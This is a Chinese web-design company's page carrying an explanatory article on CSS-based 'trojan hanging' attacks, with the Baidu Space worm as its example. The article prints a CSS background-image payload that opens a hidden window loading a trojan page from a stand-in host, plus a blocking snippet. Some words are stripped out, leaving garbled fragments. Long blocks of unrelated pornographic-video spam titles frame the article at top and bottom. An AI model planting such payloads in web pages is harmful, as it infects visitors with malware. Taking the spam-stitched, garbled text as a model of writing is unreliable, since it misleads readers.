国产综合久久久久久_国语自产精品视频在免费_国产av不卡一区二区_高清一区二区三区四区五区

福州印秀網(wǎng)絡地圖

福州印秀網(wǎng)絡技術(shù)服務有限公司

總部地址:福州市倉山區(qū)中洲島商貿(mào)中心2號412室
分部地址:福州市臺江區(qū)華興廣場1區(qū)5座3樓(達道一號)
公司電話:0591-8348 9135
服務熱線:400-800-9135
咨詢電話①:189 6508 9135 (張先生)
咨詢電話②:134 0599 8886 (何小姐)
公司網(wǎng)站:m.taotaobuxi.com www.pk0591.cn
QQ 咨詢: 建站咨詢 建站咨詢

福州印秀網(wǎng)絡logo 福州印秀網(wǎng)絡微信二維碼

在線客服

電話①:189 6508 9135(張先生)
電話②:134 0599 8886(何小姐)
電話③:0591-83489135

建站知識


警惕CSS掛馬攻擊 CSS掛馬攻防實戰(zhàn)全面解析


黑客們發(fā)現(xiàn)發(fā)現(xiàn),用來制作網(wǎng)頁特效的CSS代碼,也可以用來掛馬。

隨著Web2.0的普及,各種網(wǎng)頁特效用得越來越多,這也給黑客一個可乘之機。他們發(fā)現(xiàn),用來制作網(wǎng)頁特效的CSS代碼,也可以用來掛馬。而比較諷刺的是,CSS掛馬方式其實是從防范E掛馬的CSS代碼演變而來。

網(wǎng)站掛馬的手段最初非常單一,但是隨著Web2.0技術(shù)以及Blog、Wiki等廣泛的應用,掛馬也涌現(xiàn)出各種各樣的技術(shù),其中CSS掛馬方式,可以說是Web2.0時代黑客的最愛。有許多非常著名的網(wǎng)站都被黑客用CSS掛馬入侵過。

在我印象中,記憶最深刻的一次是百度空間CSS掛馬。當時,百度空間推出沒有多久,就有許多百度用戶收到了類似“哈,節(jié)日快樂呀!熱烈慶祝2008,心情好好,記住要想我!http://hi.baidu.com/XXXXX”的站內(nèi)消息。

由于網(wǎng)址是百度空間的網(wǎng)址,許多用戶認為不會存在安全問題,加上又有可能是自己朋友發(fā)來的,因此會毫不猶豫地點擊進入。但是進入指定的網(wǎng)址后,用戶就會感染蠕蟲病毒,并繼續(xù)傳播。

由于蠕蟲擴散非常嚴重,最終導致百度空間不得不發(fā)布官方聲明提醒用戶,并且大費周折地在服務器中清除蠕蟲的惡意代碼。那一次的掛馬事件利用的就是百度空間CSS模板功能,通過變形的expression在CSS代碼中動態(tài)執(zhí)行腳本,讓指定的遠程惡意代碼文件在后臺悄悄運行并發(fā)送大量偽造信息。

我建議大家在點擊陌生鏈接時,要多個心眼,大網(wǎng)站也是可能被掛馬的。大家在上網(wǎng)時,最好還是使用一些帶網(wǎng)頁木馬攔截功能的安全輔助工具。

黑客為什么選擇CSS掛馬?

在Web1.0時代,使用E掛馬對于黑客而言,與其說是為了更好地實現(xiàn)木馬的隱藏,倒不如說是無可奈何的一個選擇。在簡單的HTML網(wǎng)頁和缺乏交互性的網(wǎng)站中,黑客可以利用的手段也非常有限,即使采取了復雜的偽裝,也很容易被識破,還不如E來得直接和有效。

但如今交互式的Web2.0網(wǎng)站越來越多,允許用戶設(shè)置與修改的博客、SNS社區(qū)等紛紛出現(xiàn)。這些互動性非常強的社區(qū)和博客中,往往會提供豐富的功能,并且會允許用戶使用CSS層疊樣式表來對網(wǎng)站的網(wǎng)頁進行自由的修改,這促使了CSS掛馬流行。

小百科:

CSS是層疊樣式表(CascadingStyleSheets)的英文縮寫。CSS最主要的目的是將文件的結(jié)構(gòu)(用HTML或其他相關(guān)語言寫的)與文件的顯示分隔開來。這個分隔可以讓文件的可讀性得到加強、文件的結(jié)構(gòu)更加靈活。

黑客在利用CSS掛馬時,往往是借著網(wǎng)民對某些大網(wǎng)站的信任,將CSS惡意代碼掛到博客或者其他支持CSS的網(wǎng)頁中,當網(wǎng)民在訪問該網(wǎng)頁時惡意代碼就會執(zhí)行。這就如同你去一家知名且證照齊全的大醫(yī)院看病,你非常信任醫(yī)院,但是你所看的門診卻已經(jīng)被庸醫(yī)外包了下來,并且打著醫(yī)院的名義利用你的信任成功欺騙了你。但是當你事后去找人算賬時,醫(yī)院此時也往往一臉無辜。對于安全工程師而言,CSS掛馬的排查是必備常識。

[nextpage_tab]

CSS掛馬攻防實錄

攻CSS掛馬方式較多,但主流的方式是通過有漏洞的博客或者SNS社交網(wǎng)站系統(tǒng),將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。

方式1:

Body

“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式,這段惡意代碼主要是通過“background-image”配合t代碼讓網(wǎng)頁木馬悄悄地在用戶的電腦中運行。

那如何將這段CSS惡意代碼掛到正常的網(wǎng)頁中去呢?黑客可以將生成好的網(wǎng)頁木馬放到自己指定的位置,然后將該段惡意代碼寫入掛馬網(wǎng)站的網(wǎng)頁中,或者掛馬網(wǎng)頁所調(diào)用的CSS文件中。

小百科:

使用Body對象元素,主要是為了讓對象不再改變整個網(wǎng)頁文檔的內(nèi)容,通過Body對象的控制,可以將內(nèi)容或者效果控制在指定的大小內(nèi),如同使用DIV對象那樣精確地設(shè)置大小。

方式2:

Body

background-image:url(t:open(”http://www.X.com/muma.htm”,”newwindow”,”border=”1″Height=0,Width=0,top=1000,center=0,toolbar=no,menubar=no,scrollbars=no,resizable=no,location=no,status=no”))

方式1的CSS掛馬技術(shù),在運行時會出現(xiàn)空白的頁面,影響網(wǎng)頁訪問者正常的訪問,因此比較容易發(fā)現(xiàn)。不過在方式2中的這段代碼,使用了t的Open開窗,通過新開一個隱藏的窗口,在后臺悄悄地運行新窗口并激活訪問網(wǎng)頁溢出木馬頁面,不會影響訪問者觀看網(wǎng)頁內(nèi)容,因此更加隱蔽。

防網(wǎng)絡服務器被掛馬,通常會出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新,掛馬種類時刻都在變換,通過客戶端的反映來發(fā)現(xiàn)服務器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務器日志,發(fā)現(xiàn)異常信息,經(jīng)常檢查網(wǎng)站代碼,使用網(wǎng)頁木馬檢測系統(tǒng),進行排查。

目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外,還可以在網(wǎng)頁中設(shè)置CSS過濾,將CSS過濾掉。不過如果你選擇過濾CSS的話,首先需要留意自己的相關(guān)網(wǎng)頁是否有CSS的內(nèi)容,因此我們?nèi)匀皇淄朴米钄喾绞絹矸婪禖SS.阻斷代碼如下所示:

emiao1:expression(this.src=”about:blank”,this.outerHTML=”“);

將外域的木馬代碼的src重寫成本地IE404錯誤頁面的地址,這樣,外域的t代碼不會被下載。不過阻斷方式也有天生致命的弱點,弱點的秘密我們將于下次揭曉。(作者:Barry)


相關(guān)文章

首頁  電話  咨詢  頂部
国产综合久久久久久_国语自产精品视频在免费_国产av不卡一区二区_高清一区二区三区四区五区
草莓视频一区| 精品一区二区视频| 日韩在线免费视频| 国产精品7m视频| 91精品国产电影| 91黄在线观看| 97国产精品久久| 97精品久久久| 国产精品99免视看9| 91精品国产高清久久久久久91裸体 | 韩国精品久久久999| 欧美精品成人网| 欧美一级电影久久| 国产在线观看欧美| 国产精品午夜视频| 久久久国内精品| 国产精品网红直播| 国产精品传媒毛片三区| 欧美大码xxxx| 在线免费一区| 日韩一级片一区二区| 日韩女优在线播放| 国产在线资源一区| 91久久久久久久久久久久久| 久久久久久久免费视频| 国产精品区一区二区三含羞草| 国产精品久久久久91| 亚洲伊人久久综合| 日韩欧美99| 国产美女精品免费电影| 国产盗摄xxxx视频xxx69| 国产精品-区区久久久狼| 亚洲图片在线观看| 污视频在线免费观看一区二区三区| 日本亚洲欧美成人| 免费看成人午夜电影| 99爱精品视频| 日韩中文字在线| 久国内精品在线| 日韩在线一级片| 黄色网页免费在线观看| 97伦理在线四区| 精品国模在线视频| 亚洲蜜桃av| 精品www久久久久奶水| 99精品人妻少妇一区二区| 色婷婷av一区二区三区在线观看| 精品国产aⅴ麻豆| 亚洲一区二区高清视频| 日韩久久不卡| 高清视频在线观看一区| 国产成人无码a区在线观看视频| 欧美激情视频网| 欧美在线一区二区三区四| 国产美女久久久| 日韩亚洲精品视频| 无码人妻丰满熟妇区96| 国产在线一区二区三区| 国产成人一区二| 中文字幕99| 精品无码av无码免费专区| 久久久久五月天| 午夜精品美女久久久久av福利| 欧美亚洲视频在线观看| 91精品国产乱码久久久久久久久| 日韩 欧美 自拍| 国产一区二区黄色| 成人国产在线看| 久久久av网站| 日本午夜人人精品| 91精品国产91久久久久久最新 | 久久久久久久久久久久久久久久av | 久久久久久香蕉| 中文字幕乱码人妻综合二区三区 | 色香蕉在线观看| 国产精品亚洲不卡a| 国产精品对白刺激久久久| 欧美日产一区二区三区在线观看| 国产黄视频在线| 日韩在线一级片| 久久久福利视频| 亚洲成人网上| 91久久精品久久国产性色也91| 国产aaa一级片| 国产欧美日韩综合一区在线观看| 国产精品裸体瑜伽视频| 狠狠久久综合婷婷不卡| 久久久久免费看黄a片app| 午夜精品久久久久久久99热 | 日韩美女视频中文字幕| 91国产精品视频在线| 亚洲一区二区在线观| 国产免费人做人爱午夜视频| 国产精品久久国产三级国电话系列| 中文字幕免费高| 久久国产精品视频在线观看| 欧美激情一级精品国产| 日本成人黄色| 97国产精品人人爽人人做| 久久久久国产精品免费网站| 国产欧美久久久久| 在线观看国产一区| 99国精产品一二二线| 亚洲精品一卡二卡三卡四卡| 99精彩视频| 日韩av日韩在线观看| 久久99国产精品一区| 欧美主播一区二区三区美女 久久精品人 | 国产青草视频在线观看| 九色成人免费视频| 国产有码在线一区二区视频| 精品蜜桃一区二区三区| 国产欧美日韩网站| 亚洲综合在线小说| 国产黄色激情视频| 欧美一区在线直播| 国产精品嫩草视频| 国产人妻777人伦精品hd| 一本色道久久综合亚洲二区三区| 97人人香蕉| 日韩av在线播放不卡| 色婷婷综合成人| 精品少妇一区二区三区在线| 一区二区冒白浆视频| 久久精品无码中文字幕| 欧美亚洲国产日本| 欧美成人四级hd版| 91av在线不卡| 亚洲精品中字| 国产精品污www一区二区三区| 国产欧美日韩综合精品二区| 午夜免费在线观看精品视频| 国产精品视频入口| 97免费视频在线播放| 欧美另类一区| 中文字幕在线亚洲三区| 色偷偷88888欧美精品久久久| 国产肉体ⅹxxx137大胆| 日韩av在线播放不卡| 国产精品久久97| 69**夜色精品国产69乱| 加勒比海盗1在线观看免费国语版| 中文字幕一区二区三区最新| 日韩少妇与小伙激情| 成人福利网站在线观看11| 青春草国产视频| 亚洲精品中文字幕在线| 国产精品成熟老女人| 久久久com| 粉嫩av一区二区三区免费观看| 欧美日韩日本网| 亚洲国产欧美一区二区三区不卡| 国产精品久久久久久一区二区| 91久久国产精品| 国产在线观看福利| 日韩av免费看| 在线一区高清| 国产精品久久久久久网站| 久草资源站在线观看| 91九色视频在线观看| 国产一区二区网| 欧美中文在线观看国产| 色综合电影网| 亚洲色欲综合一区二区三区| 久久亚洲春色中文字幕| 色妞一区二区三区| 国产成人avxxxxx在线看| 99久热re在线精品996热视频| 精品一区二区久久久久久久网站| 青青视频免费在线| 色播五月综合| 午夜精品www| 亚洲精品9999| 亚洲国产精品一区在线观看不卡| 久久中文字幕在线| 久久成人综合视频| 国产精品福利在线| 国产精品久久久久av免费| 国产精品无码免费专区午夜| 久久久国产精品x99av| 国产mv久久久| 久久精品国产精品亚洲精品色| 99在线免费观看视频| 国产精品香蕉在线观看| 国产日韩欧美中文| 国模精品一区二区三区| 欧美激情第一页在线观看| 欧美日韩精品综合| 经典三级在线视频| 国内精品小视频在线观看| 欧美两根一起进3p做受视频| 欧美精品欧美精品系列c| 欧美日本韩国在线| 黄色大片中文字幕| 国产一区二区三区四区五区加勒比| 蜜桃传媒一区二区| 国产日韩亚洲欧美| 99免费在线视频观看| 久久久精品动漫| 日韩亚洲精品电影|